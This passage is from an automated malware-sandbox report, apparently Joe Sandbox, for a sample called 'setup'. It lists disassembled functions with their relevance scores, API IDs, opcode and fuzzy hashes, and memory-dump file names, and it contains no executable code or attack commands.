                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1452528299-0
                                                                                                                          • Opcode ID: c074212ee9f63b81f627ab1e37deb13768bad33d9c92df6e2ca8880d0a4d0276
                                                                                                                          • Instruction ID: 140a92563f485d19ee8d2877c2bb55a454adb09b7cf5752f9e3d5296cd481ba4
                                                                                                                          • Opcode Fuzzy Hash: c074212ee9f63b81f627ab1e37deb13768bad33d9c92df6e2ca8880d0a4d0276
                                                                                                                          • Instruction Fuzzy Hash: 8FB15C75A08226CBCF24DF69D4D02BAB7F1FF54300F25866ED86997A40E7748E81CB90
                                                                                                                          Function 00C32917 Relevance: 1.5, APIs: 1, Instructions: 12windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Iconic
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 110040809-0
                                                                                                                          • Opcode ID: ab4e74181a523a7b97534f8ce092d06b3007731950ecf0cc1bf3f9fdb0d7fb65
                                                                                                                          • Instruction ID: 48f05e4ec5f135fab02971ed73d7bdd423108adc2fae10188bd383827d169d65
                                                                                                                          • Opcode Fuzzy Hash: ab4e74181a523a7b97534f8ce092d06b3007731950ecf0cc1bf3f9fdb0d7fb65
                                                                                                                          • Instruction Fuzzy Hash: A7D01231520760DBC7355F15D8087D673A4BB08355F04042EC08645474E7A09C81D740
                                                                                                                          Function 00C47CBD Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00047CC9,00C46E73), ref: 00C47CC2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3192549508-0
                                                                                                                          • Opcode ID: 845b42fff3c7e8a6664e4e231a8810ca25bb2380499d4a644efdcba612f9ed02
                                                                                                                          • Instruction ID: 0860aefb24af16c2b97aa801aa04d8257718d3adf7973c4b61003a56adb19065
                                                                                                                          • Opcode Fuzzy Hash: 845b42fff3c7e8a6664e4e231a8810ca25bb2380499d4a644efdcba612f9ed02
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Function 00C87E72 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 54951025-0
                                                                                                                          • Opcode ID: 786b92875e9f09884d65cac7a14062f24257a316ef1036c2cdbd38e0f18906ef
                                                                                                                          • Instruction ID: 8587126801f01a6f575d8f1978a378535b31d8d7231bafefb46dc1865f6cf8d7
                                                                                                                          • Opcode Fuzzy Hash: 786b92875e9f09884d65cac7a14062f24257a316ef1036c2cdbd38e0f18906ef
                                                                                                                          • Instruction Fuzzy Hash: F9A001706026428BA7488F76AA19B0D3AA9BA496D1705C0AAA815C61B4EA2884509F01
                                                                                                                          Function 00C28F54 Relevance: .8, Instructions: 828COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c88309053c73262699064bfa38773ea9045e316670bf343580be28a4a81fcd82
                                                                                                                          • Instruction ID: ea5a0b69f8cb457005f8cccd33c59fff967b3e796a106dced12c1a1482e9af23
                                                                                                                          • Opcode Fuzzy Hash: c88309053c73262699064bfa38773ea9045e316670bf343580be28a4a81fcd82
                                                                                                                          • Instruction Fuzzy Hash: A672E4B5E00219DFCF08CFA9D9946ADBBF1FF48310F24816AD815AB785D734AA51CB90
                                                                                                                          Function 00C82F03 Relevance: .7, Instructions: 653COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 40c9845c14dd1eb1f4aa8cb25b34474860d736eb701fa891d5f43fdf15719fd4
                                                                                                                          • Instruction ID: 626457a1e6d66db14e576b5b6420a545c1ef27e5ef6cda00d0aaf423ce1920ed
                                                                                                                          • Opcode Fuzzy Hash: 40c9845c14dd1eb1f4aa8cb25b34474860d736eb701fa891d5f43fdf15719fd4
                                                                                                                          • Instruction Fuzzy Hash: 76324A61D25F814DD723A634C8223396248AFB77CCF55D737F826B6AA5EB29C6C34204
                                                                                                                          Function 00C86279 Relevance: .6, Instructions: 637COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a8457387be306a78de57fb0680277b7addeb9b011a81914b522fec4b659a32d9
                                                                                                                          • Instruction ID: d215900f5767023c3a801efa661b295230122352208a2dbfec8086f6e946e373
                                                                                                                          • Opcode Fuzzy Hash: a8457387be306a78de57fb0680277b7addeb9b011a81914b522fec4b659a32d9
                                                                                                                          • Instruction Fuzzy Hash: C3320721D29F414DD7239634DC2233A6649AFB73C9F15D737E82AB69A6EB38C5C35200
                                                                                                                          Function 00C7E830 Relevance: .5, Instructions: 455COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b1a12b9c14a13eca61038ba204e81bec93b3211fd4acf73c529837180d0bcc7d
                                                                                                                          • Instruction ID: 6acfb19ebdbf1201e20aa30d5159bb9bcca70c5c3302557a89a73aa9c4cc76c9
                                                                                                                          • Opcode Fuzzy Hash: b1a12b9c14a13eca61038ba204e81bec93b3211fd4acf73c529837180d0bcc7d
                                                                                                                          • Instruction Fuzzy Hash: 6B022E76E012199BDF14CFA9C8846AEFBF5FF48314F2482A9D519E7340D731AA41CB94
                                                                                                                          Function 00C2945F Relevance: .4, Instructions: 449COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d6392f95b0deb928ec42c86aef0b949bc6bdcf2860ded11debb9db6c547a7e91
                                                                                                                          • Instruction ID: afa4e56401681755e535eae1b8089d0065e04a037d8935ae07aa2a303d4a626f
                                                                                                                          • Opcode Fuzzy Hash: d6392f95b0deb928ec42c86aef0b949bc6bdcf2860ded11debb9db6c547a7e91
                                                                                                                          • Instruction Fuzzy Hash: 2212F6B1E00219DFCF08CF99D994AADBBB1FF48310F24816AD815AB785D734EA51CB94
                                                                                                                          Function 00C4C2A0 Relevance: .4, Instructions: 391COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f36ec5cca39c44363e6a4929fc44773dbccd9c00c253e9200101c1376e5e423d
                                                                                                                          • Instruction ID: 490c78598dcf5bd65ff080f4e8b99c7fd407ef6a00dedb51fde28fa9ff44015d
                                                                                                                          • Opcode Fuzzy Hash: f36ec5cca39c44363e6a4929fc44773dbccd9c00c253e9200101c1376e5e423d
                                                                                                                          • Instruction Fuzzy Hash: 1CC13571E022098FDF60DFA9C9C16FEB7B5BF54310F044129E915A7221EB75AE01ABA1
                                                                                                                          Function 00C0D571 Relevance: .4, Instructions: 382COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2ca14a1321d441743eece5f908a5f80dfddcce28c4c92d1da0303260934506b3
                                                                                                                          • Instruction ID: acafe67b8d082828e0267aa68173d891526757c6897eaa9ff5b03f34555154e6
                                                                                                                          • Opcode Fuzzy Hash: 2ca14a1321d441743eece5f908a5f80dfddcce28c4c92d1da0303260934506b3
                                                                                                                          • Instruction Fuzzy Hash: 10E1F772E1060A9FDF04CFA9D891AEDBBF2AF88310F248569D555F7384D630AA45CB50
                                                                                                                          Function 00C298E8 Relevance: .4, Instructions: 355COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 21889302f5840bb7ab53128212c91d3311c6d7f0053f2b3a8f94f3b4a8a5437f
                                                                                                                          • Instruction ID: d200151527c3ede6c963a6fd81d2bcaa2a913598f9f245dcc25d2414a1db5346
                                                                                                                          • Opcode Fuzzy Hash: 21889302f5840bb7ab53128212c91d3311c6d7f0053f2b3a8f94f3b4a8a5437f
                                                                                                                          • Instruction Fuzzy Hash: 2DF1E571A0026A8FDB64CF68D980BECB7B1FB59310F1086EAD55DE7640E630AE85DF50
                                                                                                                          Function 00C2A5D4 Relevance: .3, Instructions: 267COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0c9eb40ad593728ae2754647a4ed9005d480bf9afd466201d54975c9af8073b5
                                                                                                                          • Instruction ID: a5c3a312bf1fe4c14b54e25d18dd4126840e86ac2cb8fe1d1bd2c1fee9f96907
                                                                                                                          • Opcode Fuzzy Hash: 0c9eb40ad593728ae2754647a4ed9005d480bf9afd466201d54975c9af8073b5
                                                                                                                          • Instruction Fuzzy Hash: 7DB115B1604B10CFD335CF1AD480A22B7F0FF49715B258A5ED4AACBA92DB31E946CB51
                                                                                                                          Function 00C91E80 Relevance: .2, Instructions: 170COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d7802d03d07c65466fed54442172ee2d86165aea92b79098b3d515884ea7985a
                                                                                                                          • Instruction ID: bcc7866b49dceb45a487a7e3fc134a9f8f8e72a397ad8d87ed6c32c0c53b7895
                                                                                                                          • Opcode Fuzzy Hash: d7802d03d07c65466fed54442172ee2d86165aea92b79098b3d515884ea7985a
                                                                                                                          • Instruction Fuzzy Hash: 3C516132A543248B979CEFF8EC96BAF3603B790304386813EE507D7462DE34454AA685
                                                                                                                          Function 00C91C40 Relevance: .2, Instructions: 161COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7a892f9c8bc44d9b2aec206dc2c76e630b5306d5f2d46f9cf40c9349360f7de0
                                                                                                                          • Instruction ID: 54702253475054811ea91375307b4dd8e813b9a81deb1e604bb1a4fde44e389b
                                                                                                                          • Opcode Fuzzy Hash: 7a892f9c8bc44d9b2aec206dc2c76e630b5306d5f2d46f9cf40c9349360f7de0
                                                                                                                          • Instruction Fuzzy Hash: BD51BDB3E207214BDB18EFF9DD8A71E3653B7D030034A822CE905C762ADE70854BA685
                                                                                                                          Function 00C7C7FF Relevance: .2, Instructions: 155COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 08791dfb26926cac5f0c6bd1f6e81629a3933a022b3e51425b7a17bd731aad3e
                                                                                                                          • Instruction ID: fa504434798449355d9e689d0330cc227b7002c0ea1c3a7d5937a2ffb90bd752
                                                                                                                          • Opcode Fuzzy Hash: 08791dfb26926cac5f0c6bd1f6e81629a3933a022b3e51425b7a17bd731aad3e
                                                                                                                          • Instruction Fuzzy Hash: 97518272D0011AEFDF04CF99C891AEEBBB2FF48314F19805DE925AB241D7349A50DB91
                                                                                                                          Function 00C5ECD0 Relevance: .2, Instructions: 155COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6508406abe7609893afd75ea7bb46a8e2b3e6274f3aa2b338d8a4e1c01fce627
                                                                                                                          • Instruction ID: eccf303ef23ea4f9b7b2c50291ee40e40dffccfe6f6b36c7feab47c1f6cc1151
                                                                                                                          • Opcode Fuzzy Hash: 6508406abe7609893afd75ea7bb46a8e2b3e6274f3aa2b338d8a4e1c01fce627
                                                                                                                          • Instruction Fuzzy Hash: A141A277B865550BC72C8E3898703BAB7E39BD624170DC53DDCE297748EA219F448284
                                                                                                                          Function 00C6F9F0 Relevance: .1, Instructions: 76COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
